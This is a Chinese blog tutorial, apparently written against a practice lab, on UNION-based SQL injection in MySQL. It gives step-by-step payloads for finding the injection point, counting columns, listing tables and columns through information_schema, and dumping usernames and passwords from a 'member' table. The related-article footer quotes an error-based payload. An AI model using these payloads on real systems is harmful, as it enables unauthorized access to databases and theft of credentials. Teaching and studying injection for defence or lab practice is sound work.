SQL注入之路之一:联合注入

已于 2024-01-12 00:21:03 修改
阅读量653 收藏 2
点赞数
分类专栏: # SQL注入 文章标签: sql 数据库 网络安全
于 2023-08-10 16:47:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62715196/article/details/132213379
版权

文章目录

union联合查询注入

union联合、合并:将多条查询语句的结果合并成一个结果,union注入攻击为一种手动测试

常用系统库

information_schema

概述

information_schema 数据库是 MySQL5.0 及以上系统自带的数据库。其中保存着关于 MySQL 服务器所维护的所有其他数据库的信息。
如果我们用于注入的账号,有能够读取该库的权限,那么我们离脱裤就非常非常近了。

常用表
 tables 表
     table_schema:保存所有库名的列
     table_name:保存所有表名的列
 
 columns 表
     table_name:保存所有表名的列
     column_name:保存所有列名的列

mysql

核心数据库
主要存储用户的账户、权限等关键信息。

1.判断注入方式

输入数字型

1 or 1=1

在这里插入图片描述

输入字符型

1' or 1=1#

在这里插入图片描述
经判断若存在则为字符型
查看源代码也可以看出是字符型
在这里插入图片描述

2.判断是否存在SQL漏洞

输入1’ or ‘1’='1

只要一条成立即可
在这里插入图片描述

输入1’ or ‘1’='2

在这里插入图片描述
两次返回的页面不一样,说明存在注入,可以用联合查询的方式进行注入

3.判断字段数

使用语句 order by N 确定当前表的字符数,正确字段数等于出错字段数-1
公式: order by N-1

输入vince’order by 7#在这里插入图片描述

反馈语句报错

输入vince’order by 2#

在这里插入图片描述
没有报错,说明字段数为2

4.联合注入查询获取敏感信息

联合查询输入数字 查询页面是否有数字输出。输出的地方就是显示的内容但 是被数字替换了。-1 是让前面的表查询的内容不存在。所以就会显示数字。
输入1’ union select 1,2 #
在这里插入图片描述

获取信息

输入group_concat(user(),0x3a,database(),0x3a, version()) 通过组拼接获取当前数据库,当前用户名和当前版本
在这里插入图片描述
如果你想一次打印多个敏感信息可以使用 group_concat()把查询的函数全部写入
0x3A 是:这个符号的十六进制 在 mysql 里会自动转成符号“:”

联合查询注入通过 information_schema 获取表

在黑盒的情况下是不知道当前库有什么表的,可以通过 mysql 自带的 information_schema 查询当前库的表
查询当前库的表 limit 1 相当于 limit 0,1 表示显示第一个 1 改成 2 就是第二个 如此类推
第一个表(httpinfo)

-1' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)#

在这里插入图片描述
第二个表(member)

-1' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 12)#

在这里插入图片描述

联合查询注入通过 information_schema 获取字段

同样的查询字段也可以通过内置库 information_schema 里的 COLUMNS这个表记录所有表的字段。通过 COLUMNS 查询XXX表的字段。
获取 XXX 表第一个字段名 (id)

-1' union select 1,((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='XXX' limit 1))#

在这里插入图片描述
获取 XXX 表第二个字段名 (username)

-1' union select 1,((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='member' limit 1,1))#

获取XXX表第三个字段名(pw)

-1' union select 1,((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='member' limit 2,1))#

在这里插入图片描述

通过联合查询字段里的内容

-1' union select 1,(select group_concat(id,0x3a,username,0x3a,pw) from member limit 1)#

在这里插入图片描述

摆烂鱼
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL注入联合查询
m0_56578216的博客
08-22 903
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨表查询。两条select 语句查询结果具有相同列数:对应的列数据类型相同(特殊情况下,条件被放松)。联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨表查询的方法。由于联合查询会将数据库中的两张表按照列数拼接(纵向拼接)后再进行查询,所以要求两条select语句查询的表必须******
sql注入讲解ppt.pptx
08-10
3. 时间延迟型 SQL 注入:使用时间延迟来注入 SQL 语句。 4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询...
Web渗透-MySql-Sql注入联合查询注入
WolvenSec的博客
05-29 1282
SQL注入SQL Injection)是一种网络攻击技术,攻击者通过将恶意的SQL代码插入到应用程序的输入字段,从而欺骗应用程序执行未经授权的操作。这种攻击方式可以导致严重的安全问题,包括:数据泄露:攻击者可以未经授权地访问和检索数据库中的敏感数据。数据篡改:攻击者可以修改、删除或添加数据库中的数据。身份冒充:攻击者可以冒充其他用户,包括管理员,从而获得更高的权限。拒绝服务:通过破坏数据库或使其负载过重,使得数据库无法正常提供服务。
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入联合注入
m0_59576693的博客
09-19 633
sql联合注入联合注入细节以及联合注入流程和联合注入payload
sql注入联合查询注入
qq_50953689的博客
05-04 1520
判断数据显示点 (id一定要改为0或负数) id=0' union select 1,2,3 主要作用:测试数据库表中的有效column是哪几列
SQL注入之union 联合注入
weixin_53711701的博客
01-16 4397
SQL注入之union联合注入
sql注入之union联合注入
m0_63436163的博客
01-30 902
联合查询注入联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主。
DVWA之sql注入——联合注入和报错注入
Williamanddog的博客
12-20 1934
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的中符合string 的字符串替换为value的值。
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
学习之sql注入漏洞网址的创建
06-06
这篇文章的主题是“学习之sql注入漏洞网址的创建”,它旨在帮助初学者或研究人员建立一个自定义的环境来模拟SQL注入攻击,以便于理解和实践防御措施。下面将详细介绍这个过程以及涉及的相关知识点。 首先,SQL注入...
SQL注入详解
12-14
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序在处理用户输入数据时的不足,使得攻击者能够构造恶意的SQL语句来控制或篡改数据库。本文将深入解析SQL注入的思,帮助你理解和防范这种攻击。 首先,SQL...
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 461
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
SQL核心基础语法—快速入门MySQL
goldfish8848的博客
07-25 582
MySQL其实是DBMS软件系统,也就是说MySQL并不是一个数据库,这是很多人的误区。我们经常听到的Oracle,MySQL,微软SQL Server,都是DBMS软件系统,我们只是通过这些系统来管理和维护数据库而已,DBMS相当于用户和数据库之间的桥梁。目前有超过300种不同的DBMS系统,我们今天要学习的MySQL是关系型数据库,关系型数据库的数据存储模型很像Excel,用行和列组织数据。操作关系型的DBMS系统,大多数都是用SQL来管理数据,学会了SQL,就相当于学会了这些DBMS的核心。
spring —— 事务管理器
最新发布
firstgrass的博客
07-25 620
事务管理主要针对数据源进行操作:在数据库方面,通过 TransactionManager 事务管理器进行管理,表明一旦出现错误,该数据源的所有数据全部复原。那么数据库如何判断是否发生了错误呢?这就需要在代码方面,通过 @Transactional 注解管理相应的方法,表示一旦该方法出现错误,那么由该方法调用的数据就要执行回滚。
数据库实验:SQL Server创建数据库及基本表
sherry__yuzu的博客
07-24 329
1、掌握使用SQL SERVER Management Studio工具连接数据库引擎;2、掌握使用CREATE TABLE 创建基本表的用法;3、掌握使用ALTER TABLE 修改基本表的用法;4、掌握使用DROP TABLE删除基本表的用法;
SQL注入学习之sqli-labs靶场实战解析
14至24关:这些关卡继续深化SQL注入的各种技术和策略,包括更复杂的联合查询、信息获取、权限提升等。学习者会接触到`UNION SELECT`、`INFORMATION_SCHEMA`表的使用,以及如何利用注入进行数据库的深度探索。 sqli-...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值